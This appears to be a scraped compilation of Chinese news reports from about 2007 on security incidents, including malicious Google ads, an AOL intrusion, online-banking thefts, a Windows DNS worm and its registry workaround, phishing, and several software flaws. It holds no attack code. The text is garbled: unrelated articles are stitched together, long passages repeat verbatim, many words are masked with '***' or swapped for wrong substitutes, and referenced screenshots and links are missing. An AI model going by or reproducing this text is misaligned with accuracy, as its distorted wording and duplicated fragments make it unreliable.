作为影响力更大的网站之一,谷歌此次遭遇“黑手”使一些专家深表忧虑。他们认为,如何保护用户免遭黑客“暗算”是所有网站都要面对的难题,关乎整个产业,受影响的不仅是服务提供商。在这次的案件中,黑客用于作案的广告在谷歌搜索结果中总排在前几位。他们在用户的电脑系统中安装上特定程序,监测用户的私人信息,从而盗取他们的银行存款,涉及银行达100家之多。“这是用过的伎俩,然而它又奏效了。我们应该引以为戒,”邓纳姆说。
昨天上午,家有宠物的刘先生登录中国宠物网(),却发现网页无法打开。事实上从25日开始,网通用户就无法登录中宠网,昨天电信用户也开始无法登录。在黑客的攻击下,中宠网不得不再次关闭网站。
中宠网是之一家全国性质的宠物专业网站,也是首家取得ICP经营许可证的合法正规宠物网站。网站初期建立的宠物论坛后来发展成为国内最著名的宠物爱好者交流平台。中宠网的董事长王东光告诉记者,他们自己也是电信和网通的客户,所以公司也上不了网,陷入全面瘫痪。由于该网站有广告盈利,现在每瘫痪一天的经济损失达10万元。 *** 专家告诉记者,攻击该网站的黑客技术是DDOS,即用大规模的浏览量造成服务器崩溃。黑客利用技术控制全国成千上万台电脑,同时登录该网站地址,并发送垃圾信息,造成服务器崩溃。面对这样的攻击没有太好的 *** ,大网站往往通过购买很多地址用来预防,可是对中宠网来说很难承受,只能等待黑客停止攻击。
这不是中宠网之一次遭到攻击,2004年10月,持续一周的黑客攻击逼得王东光不得不花很多钱更换了更高级的机房。2005年7月的攻击规模更大,王东光当天就到宣武公安分局报案,被定性为刑事案件。2006年1月,北京市公安局的网监和公安部的 *** 专家很快锁定并逮捕了三名犯罪嫌疑人,他们是一家与中国宠物网存在直接竞争关系的宠物网站的董事长、总经理和 *** 管理员。对于这一次的攻击,王东光认为也可能是竞争者所为。
据网友爆料,近日两名黑客联手,侵入百度存放搜索主程序的服务器,得以查看百度搜索源程序。并查看百度后台屏蔽的数万域名,其中不乏大量大型网站二级域名。
该网友还声称黑客已经完全掌握百度漏洞,可以随时侵入。
目前,笔者正在联系更多相关人士,希望获得更多信息。以确认消息的准确性!
北京时间4月27日,据国外媒体最新报道,美国在线(AOL)公司和曼哈顿区法官办公室承认,纽约市一名少年攻破了美国在线的 *** 和数据库,数据库中存储着用户的信息,这名少年利用一个恶意软件进入了服务器,然后将机密数据转移至他自己的电脑。
在纽约市刑事法庭提交的起诉书中,曼哈顿区法官办公室指出,17岁的迈克·尼维斯(Mike Nieves)在2006年12月24日至2007年4月7日之间进行了多次攻击,例如修改电脑、电脑入侵和非法拥有电脑资料等。
以下是迈克·尼维斯攻击行为:
--进入存储用户帐号记录、地址和信用卡信息的电脑系统。
--利用恶意软件控制一台位于印度新德里的美国在线 *** 呼叫中心的电脑,并使用恶意软件将信息转移至自己的电脑。
--在没有得到许可的情况下登录49个AIM即时通信帐号,这些帐号属于美国在线 *** 支持中心员工。
--试图侵入一个美国在 *** 技术支持系统,这个系统存储着敏感的用户信息。
--利用钓鱼软件攻击美国在线员工,通过这种 *** 他共从美国在线员工和次承包商那里获得了60个帐号。
目前,迈克·尼维斯面临四项重罪指控和一项轻罪指控。曼哈顿区法官办公室一名发言人表示,迈克·尼维斯于星期一被逮捕,目前仍然处于拘留之中。这名发言人还透露,他下次出庭时间为星期五。迈克·尼维斯的律师并没有立即做出评论。
迈克·尼维斯的行为让美国在线至少损失了50万美元。目前还不清楚他是否窃取了客户数据。美国在线公司拒绝对此做出评论。曼哈顿区法官办公室的发言人则表示,针对迈克·尼维斯的调查将会继续进行下去。这名发言 人表示:“现在谈论他到底窃取了哪些数据还为时尚早。”
目前,法庭起诉书表示,尼维斯已经承认了自己的所犯下的罪行,他做出这些入侵行动的主要原因是美国在线取走了他的帐号。迈克·尼维斯表示:“我获得了他们的内部帐号,我试图利用这些帐号取回自己的帐号。”尼维斯还承认,他把自己入侵的照片发布到了一个图片网站上。 FTI咨询公司技术主管马克·拉什( Mark Rasch)表示,由于目前很容易获得多种黑客工具,因此尼维斯这样的电脑天才很容易就能够侵犯美国在线。拉什表示:“现在,一名不满的孩子自己一个人就能够进行一次这样的攻击,结果对一个大型技术企业造成巨大损失。”
拉什还表示,如果真像尼维斯自己说的那样,只是为了找回自己的帐号,那么他对窃取数据获利似乎没有什么兴趣。尽管如此,目前还无法确定尼维斯是否利用这些客户信息。
拿着银行的一纸回复,朱玉梅无可奈何:“难道我的钱放在银行里丢了,都是我的责任,银行不用负责吗?”去年12月,朱玉梅在建设银行账户上的近11万元被人从网上划转了,而银行除了出具了一份“网上银行不存在系统安全问题”的书面答复外,没有任何解决方式。
来自浙江的朱玉梅在上海一家进出口贸易公司工作,她有两张建设,一张是普通借记卡,另一张是白金卡,由于工作关系,经常会有一些大额资金来往。平时她还会用借记卡在网上支付水电费等费用,不过并没有签约网上银行业务,因此网上支付的金额是有限额的,单笔额度为500元,一天累计额度为1000元。
2006年12月7日,朱玉梅上网查询账户明细,结果无法登录,原因显示是录入密码不对。接连输入三次后都是错误,账户被锁。
12月9日,朱玉梅到建设银行上海市分行黄河路支行办理网上银行签约,结果回家后还是无法登录,账户又因密码错误被锁。之后,朱玉梅再次到银行办理网上银行签约,结果依然如故。
12月14日,一头雾水的朱玉梅第三次来到银行。按照工作人员说的 *** 在建行的电脑上操作,删除了原来的网上银行,然后再次办理了签约客户的网银。
朱玉梅回到家后重新注册登录后没有看到下载证书的按钮,于是就先查询账户明细,结果发现自己借记卡上的钱从12月6日到14日被人从网上分22次消费、转账共计人民币9898.55元。朱玉梅感到莫名其妙,赶快把网上银行删除了。
记者看到了朱玉梅在建设银行上海分行打印的明细对账单,从12月6日至12月12日,除了几笔朱玉梅的转账存入、支取外,每天均有两笔各500 元的网上消费,正好是建设银行网上银行未签约客户的支付更高限额。而就在12月14日,朱玉梅第三次办理了网上银行签约之后,当天先后两笔分别被转走60 元和2750元(记者注:手续费分别为1元和13.75元),此时朱玉梅的账户上仅剩38.16元。
12月14日当天,朱玉梅发现网上银行的账户丢失近万元后,迅速到上海市公安局黄浦分局报案,刑侦支队十队接受了报案,并出具了回执单。
12月19日,由于有客户要给朱玉梅汇款70万余元,认为借记卡不太安全的朱玉梅让客户把钱汇到她的白金卡上。为了方便上网查询,朱玉梅在12月19日下午4时许上网注册了一次,下午5时许,她看到汇款已到账。
12月20日上午10时许,朱玉梅去建行办理了60万元的现金本票,然后把白金卡办理了网上银行的签约手续。没想到,等她回家上网时发现她的密码不能登录,而这时离她在银行签约的时间仅过去了40分钟左右。顿感不妙的朱玉梅马上回到银行打印明细对账单,账单显示,卡上的余款已被通过网上转走10 万元(记者注:手续费25元),账户上仅余下410.39元。朱玉梅再次到上海市公安局黄浦分局报案。
事后,朱玉梅通过银行查询到她在网上银行两个账户上的近11万元都被转到了福建的一个账户上。
3月20日,本报独家报道了《上海一市民网上银行账户16万元莫名丢失》后,朱玉梅曾经和记者联络过,不过,她认为自己的遭遇和蔡中的遭遇还有所不同,“事实上,我还没来得及下载数字证书,但对方已经把钱转走了,因此肯定知道我的个人信息,也知道我办理了签约手续,如果我不办签约手续,可能只是一天少1000元,没想到办了签约手续,更不安全了”。
朱玉梅告诉记者,自己没有网上购物的经历,自己的银行卡账号虽然告诉过别人,但只是为了方便汇款,而且密码和其他个人信息肯定没有泄露过,家里的台式电脑和手提电脑也从未给外人使用过。
事发后,朱玉梅多次和建设银行方面联系,但一直没有任何正面回复,在她的再三要求下,建设银行上海市分行黄河路支行于3月30日给她出具了一份书面答复,内容有三项:一,就您网上银行签约事宜,我行网上银行不存在系统安全问题。二,您的资金被划转是由于您个人信息和账户密码等重要信息泄露造成的。三,对此问题可协商解决,但应当在刑事案件结案之后。
不过,公安局方面至今也没有回复,朱玉梅也曾经询问办案人员是否需要把电脑拿回去以方便侦破,但办案人员表示不需要。
朱玉梅还发现一个细节,在事发之前,建设银行的网上银行页面上,本来是可以“终止电子银行服务”的,而现在这项功能已经无法进行了。记者登录建设银行的网上银行页面看到,虽然还有“终止电子银行服务”的按钮,但点击后出现“对不起,该分行的该交易已经关闭”的提示。
记者试图联络建设银行上海分行办公室,但截至记者发稿时未得到回复。
4月23日消息,据最新消息,数千名接受美国“农业部”项目资助的公民,社会安全号码被发布在互联网上,值得关注的是,该信息甚至在该网站上泄漏长达数年之久,从而引起人们对互联网隐私权的思考。
据CNET报道,这些个人数据本应归美国农业部和人口统计局保管,然而在数年的泄漏过程中,任何互联网浏览者都可以自由登陆数据库进行浏览。“如果你把我的名字输入Google,就会轻易发现我的个人社会安全号码,这确实让我感到头疼。”一位受害者表示。
据悉目前通过这一环节泄漏的个人社会安全号码多达三万个。虽然目前没有证据表明,该数据被用于非正当目的,然而在事情爆发之后,美国农业部和人口统计局仍然迅速将数据从互联网上删除。
另一方面,美国农业部发言人表示,目前该危险可能波及到的用户总数,高达10到15万人。目前人口统计局发言人拒绝对该事件发表评论。
隐私权倡导者表示, *** 所采用的保护措施根本不够,要知道目前使用的数据库技术几乎有20年历史了,然而依然被联邦 *** 使用。然而另一方面,分析师也表示,数据库技术有助于 *** 提高透明度。
实际上,农业部和人口统计局的数据泄漏已经不是美国 *** 部门之一次事故了,在此之前还可非法入侵了农业部数据库,盗窃了大量部门工作人员的社会安全号码和个人信息,甚至包括照片等。另外,美国能源部、海军、老兵事务中心都曾经发生过社会安全号码被盗事件。
今年3月27日,浙江省丽水市人民法院作出一审判决,两名Q币大盗分别被判13年和10年,罪名是盗窃罪。据悉,这是我国首例涉及偷盗虚拟财产被重判的案件。
2006年3月24日这一天,丽水市电信公司的工作人员发现电信充值这一项业务继前一天暴涨之后又暴涨了,数据显示,电信充值业务量已高达16 万元,其中15.34万元属于Q币充值业务。这与平常每天5000元到1万元的业务量相比,反差实在太大了。之后,技术人员将全部Q币充值的话单拉出,发现那些充值的号码大部分根本没有具体的户名,怀疑是否有黑手躲在暗处操控着这项充值业务。
于是,该公司立刻向该市莲都区公安分局紧急报案。
公安机关介入侦查后,两个在“ *** ”网上以3.5折的价格大量兜售Q币的商家浮出水面。警方立刻与这两个商家取得联系,据这两个商家透露,这些Q币是他们向四川一名用户批发来的,价格为3折。
“Q币大盗”二人行
2005年11月的一天,陈某在向其公司老板胥某借钱时,提起自己有一个朋友在北京参加一个SP(服务提供商)会议后,了解到了一个技术手段,可以利用VIOP,通过虚设本机号码来盗打电信的充值平台进行Q币充值。
胥某表现出了极大的兴趣,认为这是一个很好的发财机会。因为胥某的信息公司本身就提供VOIP业务,于是胥某便决定使用其公司的便利条件进行该项技术的“实践”。
直至案发,胥某和陈某交代,他们获得的实际收益已经超过70万元,使用充值的 *** 号有上万个,盗打充值电信资费在200万元以上。据《法制日报》
几年前,Valve公司依靠一款个人开发的游戏Mod《CS》,赚的盆满钵满,自然引起了许多玩家的不满。其之后推出的 *** 游戏升级和销售系统STEAM也成了许多黑客攻击的对象。
近日,专门的反STEAM论坛中一位名叫MaddoxX贴出了自己的成果,他绕过了Valve的安全系统,获得了大量STEAM内部数据的访问权限。其中包括:
Valve内部网页截图
一部分Valve网吧帐号数据
错误记录文件
用户信用卡数据
Valve公司财务数据
他将这些截图都放在了网页上。目前,Valve的网吧用户收到的威胁最为直接,因为他已经宣称可以自建虚假的网吧帐号,拥有这一帐号可以随意下载所有STEAM游戏。而由于用户信用卡信息已经泄露,这一部分的潜在危险也十分令人担忧。
MaddoxX公布的Valve网页内容,甚至包括公司帐户余额
近日,一个利用微软DNS零日漏洞进行攻击的蠕虫病毒DNS蠕虫(worm.VanBot.bx)在互联网上流行开来。该病毒可利用DNS漏洞攻击企业DNS服务器,进而可能有机会控制企业整个 *** ,不仅可能导致企业 *** 瘫痪,同时还有机会盗取企业内部的机密信息。
据金山毒霸反病毒工程师戴光剑介绍,DNS蠕虫是一个具备后门特征的恶性蠕虫病毒,与冲击波、震荡波的攻击 *** 如出一辙,由于目前微软仍未发布针对 DNS漏洞的补丁程序,所以危险性非常大。更值得注意的是,企业用户都会在主要的服务器架设DNS服务,这就更可能受到该蠕虫的袭击。
此外,受"DNS蠕虫"攻击后的系统,会主动去攻击带有DNS漏洞的局域网内的机器,并从 *** 中某个指定URL地址下载"DNS蠕虫"及其它病毒,使被攻击的机器沦为"肉鸡"。
同时,对于DNS服务的漏洞,微软暂无相应的补丁,用户可通过修改注册表来禁止DNS服务的RPC功能。在 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters下创建一个名为 "RpcProtocol"的DWORD值,并设定数值为4,然后重启DNS服务即可生效。若非必要时,建议关闭DNS服务,并禁止445、1024、 1025端口端口的连接。
近年来,漏洞已经成为病毒传播的一个重要途径。从冲击波、震荡波到06年出现的魔鬼波以及前段时间的ANI漏洞病毒,利用漏洞传播的病毒频繁出现。目前虽然"DNS蠕虫"在国内还未大面积感染,但专家预测在微软发布补丁程序之前的一段时间内,该病毒将会非常活跃,所以广大用户需提早预防。
4月18日消息,据国外媒体报道,利用微软发布的漏洞安全警告,黑客可以更容易地开发出该漏洞的攻击 *** 。
据ZDNet网站报道,最近网上流行的针对Windows DNS弱点进行攻击的代码,就是利用微软的安全预警开发出来的。据赛门铁克称,目前至少有四组针对Windows DNS弱点进行攻击的代码。
对此,Errata Security研究人员David Maynor称,利用微软的安全建议,很容易就能开发出某漏洞的攻击 *** 。Maynor还称,微软的很多其他安全预警也是如此,因为微软提供了太多的信息。
4月19日,江民反病毒中心检测到,目前有一新蠕虫病毒(Rinbot-DNS RPC)正在利用微软WindowsDNS服务器漏洞进行大规模传播,据统计数据显示,目前在中国针对此漏洞的攻击数量爆增,仅次于美国排行第二。
据江民反病毒专家介绍,微软WindowsDNS服务器漏洞是继上周三紧急发布6个漏洞补丁后发现的又一被黑客利用的严重漏洞,目前利用该漏洞的软件已经在互联网上广泛传播,黑客也开始在攻击中利用这种软件。该漏洞会影响Windows 2000 Server和Windows 2003 Server系统,黑客们将RPC(远端程序呼叫)封包传到受影响的系统,就可以成功入侵用户的电脑系统。而Windows 2000 Professional、Windows XP和Windows Vista均不受该漏洞的影响。
据悉,微软在关于该漏洞的声明中指出,目前补丁程序正在紧张的开发和测试中,具体发布补丁的时间还没有定,但争取不晚于5月8号。同时微软针对该问题已经发布了一个临时解决放案,在补丁发布前 *** 管理员可以先禁用DNS RPC功能,并及时升级杀毒软件等。
江民反病毒专家提醒广大用户无需恐慌,对于安装了Windows XP和Windows Vista系统的用户是不存在该漏洞的威胁的,而对于 *** 管理员则需要对该漏洞引起重视,同时对于安装了Windows 2000 Server和Windows 2003 Server系统的普通用户而言也需要采取相应的措施进行预防。
专家建议用户可以通过修改注册表来进行防范:
1、启动注册表编辑器
2、找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters项
3、新建DWORD键值‘RpcProtocol',并设置数值为4
4、重新启动DNS Server服务
企业用户可以安装带有漏洞统一管理功能的 *** 版杀毒软件进行统一布防,最新发布的江民KV *** 版2007可以对 *** 各种安全威胁进行综合统一布防、统一处理,其全网系统漏洞管理功能可实现全网漏洞统一检查、系统补丁全网下载及全网自动分发,为企业用户打造一个无懈可击的安全 *** 。
日前,全球领先的 *** 安全、端到端安全解决方案提供商以及按需定制服务提供商----SurfControl(伦敦:SRF)之一个捕获了借助国内当前最热门的奥运会门票预定来骗钱的网站。 该网站实际上是一个钓鱼网站,利用广大国民对于奥运的热衷和期待来进行非法诈骗。钓鱼者 *** 了一个冒充奥运会官方票务网站的假网站通过冒充奥组委的名义广泛发布奥运会门票兜售信息,以骗取广大国民的钱款。该网站目前已被查封,但SurfControl提醒广大网民此类网站仍然存在再次出现的可能,请大家在进行在线交易时一定要谨慎行事,千万不要轻易汇款或者提交个人的财物信息,以免上当受骗。
奥运会官方票务网站 作为当前国内影响范围最广、受关注程度更高的网站,在线预售之一天即有60多万人在线注册准备进行预定,因此该类钓鱼活动潜在的破坏性和恶劣影响都令人忧心忡忡。SurfControl作为业界领先的 *** 安全解决方案提供商,在防钓鱼网站和防垃圾邮件方面更是一马当先,此次率先截获仿冒奥运会官方票务网站更加验证了其出色的拦截能力。与此同时,SurfControl还要提醒广大网民朋友在进行在线交易时切忌马虎大意,轻易提供私人的财物信息甚至不假思索就给他人汇款,中了钓鱼者的圈套而上当受骗,带来无法挽回的损失。
昨天,一款恶性电脑病毒“末日阴影”(Win32.BlackDay)被金山截获。该病毒可摧毁被感染电脑中的绝大部分文件,并无法恢复,导致系统崩溃。同时,作者在病毒程序内公开留言,挑衅反病毒厂商。
金山毒霸反病毒工程师戴光剑说,用户一旦感染该病毒,电脑会自动弹出一个病毒作者的留言框,“Your computer were infect my worm! And if you want to clear this worm,please add my *** number *******”(你的电脑感染了我的蠕虫,如果你想清除这个蠕虫,请加我的 *** ,号码为……),更嚣张的是病毒作者还留下了自己年龄17岁和 *** ID等信息。
据分析,“末日阴影”会针对受感染电脑内的绝大部分文件进行摧毁性的操作,包括感染网页文件、可执行文件和删除其他文件等,而且破坏后的文件无法被恢复。
反病毒工程师提醒,在使用U盘等移动存储设备前,用户一定要利用杀毒软件进行扫描,以防病毒利用U盘传播。
据国外媒体报道,丹麦安全公司Secunia日前在Photoshop软件中发现了“高危”安全漏洞,允许黑客远程访问用户计算机。
丹麦安全公司Secunia日前表示,在Adobe Photoshop CS2和CS3版本中发现“高危”安全漏洞,可导致用户计算机被黑客远程攻击。
该漏洞主要存在于Photoshop处理BMP、DIB和RLE等位图文件的方式上,此时,黑客可以发动缓存溢出攻击,并植入恶意代码。
据悉,该漏洞最初是由法国安全研究员“Marsu”发现的,并且在Windows XP SP2测试过。目前,攻击代码已经被公布在互联网上。
Secunia建议,用户不要轻易用Photosho可疑位图文件。而Adobe目前正在调查此事。
4月25日消息,据国外媒体报道,安全人员上周在苹果Safari浏览器中发现的安全漏洞同样影响Windows操作系统。
在上周于北美举行的“CanSecWest计算机安全大会”上,软件工程师Shaun Macaulay利用安全研究员Dino Dai Zovi发现的一处Safari浏览器漏洞,成功入侵了 *** 上的一台MacBook计算机。
为此,大会还奖赏该Macaulay和Zovi一台MacBook笔记本和1万美元现金。据悉,该漏洞存在于QuickTime播放器和Java编程语言互动中。但是,QuickTime同样运行在Windows系统中,这意味着Windows系统也同样存在该漏洞。
对此,3Com TippingPoint部门安全响应经理Terri Forslof称,由于该漏洞并未公开,因此对QuickTime用户的安全威胁并不是很大。而Dai Zovi则表示,他至少向苹果报告了八处安全漏洞。
上海、浙江等地近日陆续发生了网上银行个人账户资金被黑客盗取事件,被盗金额更高达到十几万元。北京江民公司的反病毒专家提醒,随着“五一”黄金周临近,通过网上银行购物的消费行为会大幅增加,消费者应当心“网银大盗”等病毒偷袭。
“网银大盗”是一种木马病毒,可以盗取多家网上银行及“支付宝”等系统的个人交易账户和密码。
据介绍,“网银大盗”主要通过6种方式发动攻击:假冒网上银行网站或者攻击网站服务器,骗取用户资料;记录键盘输入动作;嵌入浏览器,在电脑数据以安全加密方式发送之前盗取密码;通过屏幕录像偷窥用户输入密码的操作过程;窃取网上银行数字证书文件,自动记录用户资料;伪装网上银行弹出窗口,以系统更新或服务器繁忙等理由诱使用户将账号、密码发送到指定网站。
反病毒专家提醒,网民应养成良好的上网习惯:
———选购带主动防御、实时监控等功能的正版杀毒软件;
———及时安装微软发布的安全漏洞补丁,及时升级杀毒软件病毒库;
———电脑经常进行病毒全面清查,不要随意点击陌生网址、邮件,接收邮件时要打开杀毒软件的邮件监控功能;
———登录网上银行页面时,尽量直接在浏览器地址栏中输入网址,慎用搜索引擎;
———登录交易系统时使用软键盘,通过鼠标点击方式输入交易账号及密码,交易完成后及时退出网上交易系统。
圈中位置是谷歌向来赚钱的广告连接位,不过自从黑客事件后,网页暂时少了这一功能。
黑客犯罪手法
1 犯罪分子首先建立自己的网站
2 出高价在谷歌上登广告,这样广告就可以始终与搜索结果前几名同时出现。
3 一旦有用户点击这个“陷阱”广告,犯罪分子就能够跟踪并窃取他的信息。
据新华社电搜寻网站Google最近再度中招,被迫抽起与20多个常用检索词有关的赞助商广告链接,原因是它们被黑客故伎重演,通过跟踪在网上寻觅商业广告的用户,窃取他们的个人信息以及银行账户密码。若网民在检索时,不慎点击了这些状似搜寻结果的广告链接,随时可能被黑客盗取银行户口号码、密码等个人数据,蒙受金钱损失。
具体受害人数还不清楚
美国近日发生黑客盗窃事件,犯罪分子通过在谷歌网站上发布广告窃取用户银行账户和密码,目前具体被盗人数还不得而知。电脑安全专家表示本次黑客盗窃应属个人行为。“中招”的用户大多使用微软的Windows XP系统且未及时更新。
出售检索词赞助广告链接,是谷歌一个重要收入来源。仅今年之一季度,谷歌公司的广告盈利就达10亿美元。不过安全专家称,这次黑客盗窃并未破坏谷歌的商业广告业务。举例说,当网民输入car这个检索词,谷歌网站除了列出一系列查询结果外,还会在最上面列出汽车赞助商的广告链接,这次黑客就是利用这类广告链接作恶。
谷歌24日宣布已经中断犯罪分子使用的广告链接,并已冻结相关账户。目前,公司正与技术专家一同对其余链接严密排查,确保遭黑客渗透的链接能够被及时发现并隔离。及时发现黑客盗窃的是宾夕法尼亚州软件安全公司“安全漏洞防御实验室”,同时被发现的还有一系列针对谷歌网站的恶作剧程序。
各大网站敲响警钟
美国威瑞信公司技术专家肯·邓纳姆认为,此次黑客作案手段与2005年一起案件十分相似。当时一群犯罪分子注册了一个网站,并假借一著名零售公司之名在谷歌网页上发布广告。前去订购的用户被犯罪分子跟踪,然后犯罪分子盗取用户的银行卡密码,并窃取其他个人信息。邓纳姆认为,案件发生后谷歌应加强广告受理的认证力度,尤其对那些出大价钱登广告的客户。然而,他同时承认,对所有广告用户逐一调查开支巨大。
作为影响力更大的网站之一,谷歌此次遭遇“黑手”使一些专家深表忧虑。他们认为,如何保护用户免遭黑客“暗算”是所有网站都要面对的难题,关乎整个产业,受影响的不仅是服务提供商。在这次的案件中,黑客用于作案的广告在谷歌搜索结果中总排在前几位。他们在用户的电脑系统中安装上特定程序,监测用户的私人信息,从而盗取他们的银行存款,涉及银行达100家之多。“这是用过的伎俩,然而它又奏效了。我们应该引以为戒,”邓纳姆说。
北京时间4月27日,据国外媒体最新报道,美国在线(AOL)公司和曼哈顿区法官办公室承认,纽约市一名少年攻破了美国在线的 *** 和数据库,数据库中存储着用户的信息,这名少年利用一个恶意软件进入了服务器,然后将机密数据转移至他自己的电脑。
在纽约市刑事法庭提交的起诉书中,曼哈顿区法官办公室指出,17岁的迈克·尼维斯(Mike Nieves)在2006年12月24日至2007年4月7日之间进行了多次攻击,例如修改电脑、电脑入侵和非法拥有电脑资料等。
以下是迈克·尼维斯攻击行为:
--进入存储用户帐号记录、地址和信用卡信息的电脑系统。
--利用恶意软件控制一台位于印度新德里的美国在线 *** 呼叫中心的电脑,并使用恶意软件将信息转移至自己的电脑。
--在没有得到许可的情况下登录49个AIM即时通信帐号,这些帐号属于美国在线 *** 支持中心员工。
--试图侵入一个美国在 *** 技术支持系统,这个系统存储着敏感的用户信息。
--利用钓鱼软件攻击美国在线员工,通过这种 *** 他共从美国在线员工和次承包商那里获得了60个帐号。
目前,迈克·尼维斯面临四项重罪指控和一项轻罪指控。曼哈顿区法官办公室一名发言人表示,迈克·尼维斯于星期一被逮捕,目前仍然处于拘留之中。这名发言人还透露,他下次出庭时间为星期五。迈克·尼维斯的律师并没有立即做出评论。
迈克·尼维斯的行为让美国在线至少损失了50万美元。目前还不清楚他是否窃取了客户数据。美国在线公司拒绝对此做出评论。曼哈顿区法官办公室的发言人则表示,针对迈克·尼维斯的调查将会继续进行下去。这名发言 人表示:“现在谈论他到底窃取了哪些数据还为时尚早。”
目前,法庭起诉书表示,尼维斯已经承认了自己的所犯下的罪行,他做出这些入侵行动的主要原因是美国在线取走了他的帐号。迈克·尼维斯表示:“我获得了他们的内部帐号,我试图利用这些帐号取回自己的帐号。”尼维斯还承认,他把自己入侵的照片发布到了一个图片网站上。 FTI咨询公司技术主管马克·拉什( Mark Rasch)表示,由于目前很容易获得多种黑客工具,因此尼维斯这样的电脑天才很容易就能够侵犯美国在线。拉什表示:“现在,一名不满的孩子自己一个人就能够进行一次这样的攻击,结果对一个大型技术企业造成巨大损失。”
拉什还表示,如果真像尼维斯自己说的那样,只是为了找回自己的帐号,那么他对窃取数据获利似乎没有什么兴趣。尽管如此,目前还无法确定尼维斯是否利用这些客户信息。
4月18日消息,据国外媒体报道,利用微软发布的漏洞安全警告,黑客可以更容易地开发出该漏洞的攻击 *** 。
据ZDNet网站报道,最近网上流行的针对Windows DNS弱点进行攻击的代码,就是利用微软的安全预警开发出来的。据赛门铁克称,目前至少有四组针对Windows DNS弱点进行攻击的代码。
对此,Errata Security研究人员David Maynor称,利用微软的安全建议,很容易就能开发出某漏洞的攻击 *** 。Maynor还称,微软的很多其他安全预警也是如此,因为微软提供了太多的信息。
昨天,一款恶性电脑病毒“末日阴影”(Win32.BlackDay)被金山截获。该病毒可摧毁被感染电脑中的绝大部分文件,并无法恢复,导致系统崩溃。同时,作者在病毒程序内公开留言,挑衅反病毒厂商。
金山毒霸反病毒工程师戴光剑说,用户一旦感染该病毒,电脑会自动弹出一个病毒作者的留言框,“Your computer were infect my worm! And if you want to clear this worm,please add my *** number *******”(你的电脑感染了我的蠕虫,如果你想清除这个蠕虫,请加我的 *** ,号码为……),更嚣张的是病毒作者还留下了自己年龄17岁和 *** ID等信息。
据分析,“末日阴影”会针对受感染电脑内的绝大部分文件进行摧毁性的操作,包括感染网页文件、可执行文件和删除其他文件等,而且破坏后的文件无法被恢复。
反病毒工程师提醒,在使用U盘等移动存储设备前,用户一定要利用杀毒软件进行扫描,以防病毒利用U盘传播。
著名国际黑客站点zone-h.org被中国黑客所黑,
中国北京时间2007年4月18日1:40分左右,著名黑客站点zone-h。org首页被黑客替换,主页呈现如下字样:
现在首页已经恢复!
被黑截图:
即日北京时间9点左右,收到群内朋友发的一个链接:
一看是中国被黑站点统计网的,上书:
不乏讽刺意味!
据英国《每日电讯》报道,英国内政大臣约翰—里德在昨天表示, *** 可能对英国的计算机 *** 实施电子攻击,以图给英国的经济制造混乱并破坏航空管制。
里德警告 *** 恐怖活动会带来“破坏性的后果”,他表示对英国内政部的重组将使他能够“每天早晨醒来都首先想到国家的安全” 。
英国内政部将于今年5月9日进行重组,改组后的内政部将会加大力度减少犯罪、恐怖活动以及大规模的移民。届时内政大臣里德将 直接向英国首相负责,并协助首相制定 *** 的安全战略。
里德称英国首先要保护的应该是国家至关重要的基础设施不受 *** 的破坏。他称 *** 的目标是通过削弱金融市场最终“让 我们破产”,西方国家的供应是恐怖组织的攻击目标之一,破坏石油供应这样的能源会带来“不可估量损失”。里德还表示西方国家21世纪的电子通讯 *** 现在也成为了 *** 攻击的对象。
按照美国联邦调查局的说法, *** 恐怖主义是任何“由次国家组织或秘密特工发动的对信息、计算机程序和数据进行的有预谋的、由政治因素推动的攻击。” *** 恐怖袭击会带来人员伤亡或特大的经济损失。
美国基础设施保护委员会称 *** 恐怖活动的目标可能包括银行业、军事机构、电力部门、航空管制中心以及水力系统。
美国众议院在2000年接到的一份有关“ *** 恐怖主义”的报告中称, *** 对计算机 *** 和计算机贮存信息实施攻击,通过控制爆炸、飞机相撞和水污染最终可能会导致人员的伤亡或者是重大的财产损失。这类的攻击包括散播计算机的入侵,也包括黑客对电脑的攻击,就象1999年克索沃危机期间北约计算机受到的“电子邮件炸弹”的攻击一样。
里德承认“人们越恐慌,环境就越不安全”,他称公众、企业和 *** 必须团结起来一起保护国家的基础设施不受破坏。
里德表示,“敌人变化的步伐之快、程度和范围之大,不允许我们出现丝毫的自满和放松”。
拿着银行的一纸回复,朱玉梅无可奈何:“难道我的钱放在银行里丢了,都是我的责任,银行不用负责吗?”去年12月,朱玉梅在建设银行账户上的近11万元被人从网上划转了,而银行除了出具了一份“网上银行不存在系统安全问题”的书面答复外,没有任何解决方式。
来自浙江的朱玉梅在上海一家进出口贸易公司工作,她有两张建设,一张是普通借记卡,另一张是白金卡,由于工作关系,经常会有一些大额资金来往。平时她还会用借记卡在网上支付水电费等费用,不过并没有签约网上银行业务,因此网上支付的金额是有限额的,单笔额度为500元,一天累计额度为1000元。
2006年12月7日,朱玉梅上网查询账户明细,结果无法登录,原因显示是录入密码不对。接连输入三次后都是错误,账户被锁。
12月9日,朱玉梅到建设银行上海市分行黄河路支行办理网上银行签约,结果回家后还是无法登录,账户又因密码错误被锁。之后,朱玉梅再次到银行办理网上银行签约,结果依然如故。
12月14日,一头雾水的朱玉梅第三次来到银行。按照工作人员说的 *** 在建行的电脑上操作,删除了原来的网上银行,然后再次办理了签约客户的网银。
朱玉梅回到家后重新注册登录后没有看到下载证书的按钮,于是就先查询账户明细,结果发现自己借记卡上的钱从12月6日到14日被人从网上分22次消费、转账共计人民币9898.55元。朱玉梅感到莫名其妙,赶快把网上银行删除了。
记者看到了朱玉梅在建设银行上海分行打印的明细对账单,从12月6日至12月12日,除了几笔朱玉梅的转账存入、支取外,每天均有两笔各500 元的网上消费,正好是建设银行网上银行未签约客户的支付更高限额。而就在12月14日,朱玉梅第三次办理了网上银行签约之后,当天先后两笔分别被转走60 元和2750元(记者注:手续费分别为1元和13.75元),此时朱玉梅的账户上仅剩38.16元。
12月14日当天,朱玉梅发现网上银行的账户丢失近万元后,迅速到上海市公安局黄浦分局报案,刑侦支队十队接受了报案,并出具了回执单。
今年3月27日,浙江省丽水市人民法院作出一审判决,两名Q币大盗分别被判13年和10年,罪名是盗窃罪。据悉,这是我国首例涉及偷盗虚拟财产被重判的案件。
